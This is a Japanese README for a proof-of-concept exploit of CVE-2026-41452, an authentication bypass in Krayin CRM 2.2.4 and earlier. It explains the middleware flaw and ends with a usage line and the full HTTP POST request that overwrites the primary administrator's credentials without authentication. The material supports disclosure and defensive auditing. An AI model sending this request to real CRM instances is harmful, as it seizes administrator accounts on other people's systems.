
CVE-2026-41452の概念実証エクスプロイト。Krayin CRM <= 2.2.4における重大な認証バイパスであり、ミドルウェアバイパスを介して未認証の管理者アカウント乗っ取りを可能にする。
Krayin CRM バージョン 2.2.4 以前に影響を与える重大な認証欠如の脆弱性(CVE-2026-41452)を実証する概念実証(PoC)。
この欠陥により、認証されていないリモート攻撃者が特定の HTTP ヘッダーを注入することで、アプリケーションのインストールミドルウェアロジック(CanInstall)をバイパスし、プライマリ管理者アカウント設定を完全に上書きすることが可能になります。
[!WARNING]
免責事項: このリポジトリおよびここに含まれる情報は、教育目的、セキュリティ研究、および許可された防御的監査のために厳密に提供されています。コンピュータシステムの不正なテストや悪用は厳しく違法です。著者はこの資料のいかなる誤用に対しても責任を負いません。
CVE ID: CVE-2026-41452
脆弱性の種類: 認証欠如 / ミドルウェアバイパス
深刻度: 重大 (CVSS 9.8)
影響を受けるソフトウェア: Krayin CRM <= 2.2.4
修正バージョン: Krayin CRM >= 2.2.5
この脆弱性は、アプリケーションのセットアップミドルウェア内に存在します。認証されていない攻撃者は、/install/api/admin-config-setup エンドポイントを標的とした細工されたペイロードに X-Requested-With: XMLHttpRequest ヘッダーを追加することができます。これにより、CanInstall ミドルウェア内で期待されるリダイレクトチェックが抑制され、プライマリシステム管理者のハードコードされた ID(1)を標的とする認証されていない updateOrInsert データベース操作が露呈します。
テストを許可されているターゲットインスタンスに対してスクリプトを実行します:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
内部的には、バイパスは以下の HTTP トランザクション構造を介してトリガーされます:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123